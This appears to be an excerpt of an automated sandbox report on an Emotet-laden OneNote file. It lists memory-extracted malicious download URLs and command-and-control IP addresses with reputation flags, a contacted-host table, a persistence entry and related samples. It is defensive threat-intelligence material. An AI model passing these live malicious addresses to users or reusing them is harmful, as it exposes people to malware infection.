                                          https://66.228.32.31:7080/regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.0000000001313000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                            high
                                            https://103.43.75.120/ncju/qfgtbvn/regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://api.microsoftstream.com/api/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                              high
                                              https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                high
                                                https://cr.office.com9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                  high
                                                  https://103.43.75.120:443/ncju/qfgtbvn/regsvr32.exe, 00000004.00000002.886694503.00000000012FA000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://91.207.28.33:8080/regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://res.getmicrosoftkey.com/api/redemptionevents9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.com9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://ozmeydan.com/cekici/9/wscript.exe, wscript.exe, 00000001.00000003.391922304.0000000005992000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407332716.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406516474.0000000005718000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406615479.0000000005765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.000000000552C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399039460.0000000005547000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404823055.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413070673.0000000005817000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.419988118.0000000005581000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409633319.000000000590F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396283294.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401845274.00000000055E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395825240.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396708217.0000000005501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410529992.000000000599A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://my.microsoftpersonalcontent.com9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://store.office.cn/addinstemplate9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://penshorn.org/admin/Ses8712iGR8du/tMwscript.exe, 00000001.00000003.411335660.0000000005141000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://messaging.engagement.office.com/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                      high
                                                      http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0wscript.exe, 00000001.00000003.411335660.000000000513C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://ozmeydan.cowscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420641368.00000000058D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412030657.00000000058D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409457535.00000000058D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409669464.00000000058D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://91.207.28.33:8080/ncju/qfgtbvn/Pj?regsvr32.exe, 00000004.00000002.886694503.00000000012E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                        high
                                                        https://www.odwebp.svc.ms9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.gomespontes.com.br/Rwscript.exe, 00000001.00000003.391922304.0000000005992000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410529992.000000000599A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.411607010.000000000599A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420832267.00000000059A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                            high
                                                            https://api.addins.store.officeppe.com/addinstemplate9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://graph.windows.net9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                              high
                                                              https://consent.config.office.com/consentcheckin/v1.0/consents9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                high
                                                                https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                  high
                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                    high
                                                                    https://10.207.28.33:8080/regsvr32.exe, 00000004.00000002.887361819.00000000034E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://d.docs.live.net9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://ncus.contentsync.9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                      high
                                                                      http://weather.service.msn.com/data.aspx9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                        high
                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                          high
                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                            high
                                                                            https://pushchannel.1drv.ms9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                              high
                                                                              https://wus2.contentsync.9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://wrappixels.com/wp-admin/Gdwscript.exe, 00000001.00000003.412417949.0000000005749000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420539950.000000000574A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://clients.config.office.net/user/v1.0/ios9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                high
                                                                                https://91.207.28.33:8080/ncju/qfgtbvn/Bregsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://o365auditrealtimeingestion.manage.office.com9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                  high
                                                                                  https://outlook.office365.com/api/v1.0/me/Activities9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                    high
                                                                                    https://107.170.39.149:8080/4regsvr32.exe, 00000004.00000002.886694503.000000000135C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://clients.config.office.net/user/v1.0/android/policies9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                      high
                                                                                      https://169.57.156.166:8080/ncju/qfgtbvn/ConnectionCache-Controlregsvr32.exe, 00000004.00000002.886694503.000000000135C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://entitlement.diagnostics.office.com9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                        high
                                                                                        https://91.207.28.33:8080/ncju/qfgtbvn/Gregsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                          high
                                                                                          https://outlook.office.com/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                            high
                                                                                            https://storage.live.com/clientlogs/uploadlocation9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                              high
                                                                                              https://microsoftapc-my.sharepoint.com9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://substrate.office.com/search/api/v1/SearchHistory9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                high
                                                                                                https://clients.config.office.net/c2r/v1.0/InteractiveInstallation9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                  high
                                                                                                  https://graph.windows.net/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                    high
                                                                                                    https://devnull.onenote.com9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                      high
                                                                                                      https://messaging.office.com/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                        high
                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                          high
                                                                                                          https://skyapi.live.net/Activity/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://91.121.146.47:8080/ncju/qfgtbvn/regsvr32.exe, 00000004.00000002.886622640.0000000001288000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.886694503.0000000001302000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          https://api.cortana.ai9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://messaging.action.office.com/setcampaignaction9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                            high
                                                                                                            https://91.207.28.33:8080/ebxregsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://91.207.28.33:8080/mbpregsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                              high
                                                                                                              https://staging.cortana.ai9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://onedrive.live.com/embed?9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                high
                                                                                                                https://augloop.office.com9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                  high
                                                                                                                  https://api.diagnosticssdf.office.com/v2/file9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                    high
                                                                                                                    https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                      high
                                                                                                                      https://826.189.28.199:8080/regsvr32.exe, 00000004.00000002.887361819.00000000034E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      low
                                                                                                                      https://api.diagnostics.office.com9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                        high
                                                                                                                        https://store.office.de/addinstemplate9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                          high
                                                                                                                          https://91.207.28.33:8080/ncju/qfgtbvn/Ihregsvr32.exe, 00000004.00000002.886694503.00000000012FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          unknown
                                                                                                                          https://wus2.pagecontentsync.9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://api.powerbi.com/v1.0/myorg/datasets9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                            high
                                                                                                                            http://ozmeydan.com/cekici/9/xMwscript.exe, 00000001.00000003.411335660.0000000005141000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            https://cortana.ai/api9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://184.168.155.143:8080/regsvr32.exe, 00000004.00000002.886694503.000000000135C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://api.diagnosticssdf.office.com9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                              high
                                                                                                                              https://login.microsoftonline.com/9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                                high
                                                                                                                                http://softwareulike.com/cWIYxWMPkK/wscript.exe, wscript.exe, 00000001.00000003.391922304.0000000005992000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407332716.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406516474.0000000005718000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406615479.0000000005765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.000000000552C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399039460.0000000005547000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404823055.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413070673.0000000005817000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.419988118.0000000005581000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409633319.000000000590F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396283294.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401845274.00000000055E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395825240.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396708217.0000000005501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410529992.000000000599A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                unknown
                                                                                                                                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize9204E5E0-0B60-432B-8209-3A8845F9936A.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://164.90.222.65/regsvr32.exe, 00000004.00000002.886694503.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577372470.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.0000000001313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs
                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  110.232.117.186
                                                                                                                                  unknownAustralia
                                                                                                                                  56038RACKCORP-APRackCorpAUtrue
                                                                                                                                  103.132.242.26
                                                                                                                                  unknownIndia
                                                                                                                                  45117INPL-IN-APIshansNetworkINtrue
                                                                                                                                  104.168.155.143
                                                                                                                                  unknownUnited States
                                                                                                                                  54290HOSTWINDSUStrue
                                                                                                                                  79.137.35.198
                                                                                                                                  unknownFrance
                                                                                                                                  16276OVHFRtrue
                                                                                                                                  115.68.227.76
                                                                                                                                  unknownKorea Republic of
                                                                                                                                  38700SMILESERV-AS-KRSMILESERVKRtrue
                                                                                                                                  163.44.196.120
                                                                                                                                  unknownSingapore
                                                                                                                                  135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue
                                                                                                                                  206.189.28.199
                                                                                                                                  unknownUnited States
                                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  31.31.196.172
                                                                                                                                  bbvoyage.comRussian Federation
                                                                                                                                  197695AS-REGRUtrue
                                                                                                                                  186.202.153.5
                                                                                                                                  gomespontes.com.brBrazil
                                                                                                                                  27715LocawebServicosdeInternetSABRtrue
                                                                                                                                  203.26.41.131
                                                                                                                                  penshorn.orgAustralia
                                                                                                                                  38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                                                                                                                  107.170.39.149
                                                                                                                                  unknownUnited States
                                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  66.228.32.31
                                                                                                                                  unknownUnited States
                                                                                                                                  63949LINODE-APLinodeLLCUStrue
                                                                                                                                  197.242.150.244
                                                                                                                                  unknownSouth Africa
                                                                                                                                  37611AfrihostZAtrue
                                                                                                                                  185.4.135.165
                                                                                                                                  unknownGreece
                                                                                                                                  199246TOPHOSTGRtrue
                                                                                                                                  183.111.227.137
                                                                                                                                  unknownKorea Republic of
                                                                                                                                  4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                                                                                  45.176.232.124
                                                                                                                                  unknownColombia
                                                                                                                                  267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                                                                                                                  169.57.156.166
                                                                                                                                  unknownUnited States
                                                                                                                                  36351SOFTLAYERUStrue
                                                                                                                                  164.68.99.3
                                                                                                                                  unknownGermany
                                                                                                                                  51167CONTABODEtrue
                                                                                                                                  139.59.126.41
                                                                                                                                  unknownSingapore
                                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  167.172.253.162
                                                                                                                                  unknownUnited States
                                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  167.172.199.165
                                                                                                                                  unknownUnited States
                                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  202.129.205.3
                                                                                                                                  unknownThailand
                                                                                                                                  45328NIPA-AS-THNIPATECHNOLOGYCOLTDTHtrue
                                                                                                                                  147.139.166.154
                                                                                                                                  unknownUnited States
                                                                                                                                  45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                  153.92.5.27
                                                                                                                                  unknownGermany
                                                                                                                                  47583AS-HOSTINGERLTtrue
                                                                                                                                  159.65.88.10
                                                                                                                                  unknownUnited States
                                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  172.105.226.75
                                                                                                                                  unknownUnited States
                                                                                                                                  63949LINODE-APLinodeLLCUStrue
                                                                                                                                  164.90.222.65
                                                                                                                                  unknownUnited States
                                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  213.239.212.5
                                                                                                                                  unknownGermany
                                                                                                                                  24940HETZNER-ASDEtrue
                                                                                                                                  5.135.159.50
                                                                                                                                  unknownFrance
                                                                                                                                  16276OVHFRtrue
                                                                                                                                  186.194.240.217
                                                                                                                                  unknownBrazil
                                                                                                                                  262733NetceteraTelecomunicacoesLtdaBRtrue
                                                                                                                                  119.59.103.152
                                                                                                                                  unknownThailand
                                                                                                                                  56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue
                                                                                                                                  159.89.202.34
                                                                                                                                  unknownUnited States
                                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  91.121.146.47
                                                                                                                                  unknownFrance
                                                                                                                                  16276OVHFRtrue
                                                                                                                                  160.16.142.56
                                                                                                                                  unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                                                                                                  201.94.166.162
                                                                                                                                  unknownBrazil
                                                                                                                                  28573CLAROSABRtrue
                                                                                                                                  91.207.28.33
                                                                                                                                  unknownKyrgyzstan
                                                                                                                                  39819PROHOSTKGtrue
                                                                                                                                  103.75.201.2
                                                                                                                                  unknownThailand
                                                                                                                                  133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                                                                                                                  103.43.75.120
                                                                                                                                  unknownJapan20473AS-CHOOPAUStrue
                                                                                                                                  188.44.20.25
                                                                                                                                  unknownMacedonia
                                                                                                                                  57374GIV-ASMKtrue
                                                                                                                                  45.235.8.30
                                                                                                                                  unknownBrazil
                                                                                                                                  267405WIKINETTELECOMUNICACOESBRtrue
                                                                                                                                  153.126.146.25
                                                                                                                                  unknownJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                                                                                                  72.15.201.15
                                                                                                                                  unknownUnited States
                                                                                                                                  13649ASN-VINSUStrue
                                                                                                                                  187.63.160.88
                                                                                                                                  unknownBrazil
                                                                                                                                  28169BITCOMPROVEDORDESERVICOSDEINTERNETLTDABRtrue
                                                                                                                                  82.223.21.224
                                                                                                                                  unknownSpain
                                                                                                                                  8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                  173.212.193.249
                                                                                                                                  unknownGermany
                                                                                                                                  51167CONTABODEtrue
                                                                                                                                  95.217.221.146
                                                                                                                                  unknownGermany
                                                                                                                                  24940HETZNER-ASDEtrue
                                                                                                                                  149.56.131.28
                                                                                                                                  unknownCanada
                                                                                                                                  16276OVHFRtrue
                                                                                                                                  182.162.143.56
                                                                                                                                  unknownKorea Republic of
                                                                                                                                  3786LGDACOMLGDACOMCorporationKRtrue
                                                                                                                                  1.234.2.232
                                                                                                                                  unknownKorea Republic of
                                                                                                                                  9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                                                  129.232.188.93
                                                                                                                                  unknownSouth Africa
                                                                                                                                  37153xneeloZAtrue
                                                                                                                                  94.23.45.86
                                                                                                                                  unknownFrance
                                                                                                                                  16276OVHFRtrue
                                                                                                                                  Joe Sandbox Version:37.0.0 Beryl
                                                                                                                                  Analysis ID:830446
                                                                                                                                  Start date and time:2023-03-20 11:39:40 +01:00
                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 11m 0s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                  Number of analysed new started processes analysed:12
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • HDC enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample file name:8846_0.one
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.expl.evad.winONE@11/325@4/51
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                  HDC Information:
                                                                                                                                  • Successful, ratio: 50.2% (good quality ratio 42.4%)
                                                                                                                                  • Quality average: 60.5%
                                                                                                                                  • Quality standard deviation: 35.6%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 88%
                                                                                                                                  • Number of executed functions: 19
                                                                                                                                  • Number of non-executed functions: 136
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .one
                                                                                                                                  • Override analysis time to 240s for rundll32
                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, rundll32.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.76.141, 20.231.69.218, 209.197.3.8
                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, ctldl.windowsupdate.com, officeclient.microsoft.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                  TimeTypeDescription
                                                                                                                                  11:41:19AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
                                                                                                                                  11:41:25API Interceptor2x Sleep call for process: wscript.exe modified
                                                                                                                                  11:41:53API Interceptor20x Sleep call for process: regsvr32.exe modified
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  110.232.117.186click.wsfGet hashmaliciousEmotetBrowse
                                                                                                                                    f_00321b.dllGet hashmaliciousEmotetBrowse
                                                                                                                                      f_00321b.dllGet hashmaliciousEmotetBrowse
                                                                                                                                        f_00321b.dllGet hashmaliciousEmotetBrowse
                                                                                                                                          aOHLlvfakv.dllGet hashmaliciousEmotetBrowse
                                                                                                                                            aOHLlvfakv.dllGet hashmaliciousEmotetBrowse
                                                                                                                                              Form - 16 Mar, 2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                MBQ24253060297767042_202303161424.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                  iMedPub_LTD_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                    iMedPub_LTD_6.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                      INNOVINC.oneGet hashmaliciousEmotetBrowse
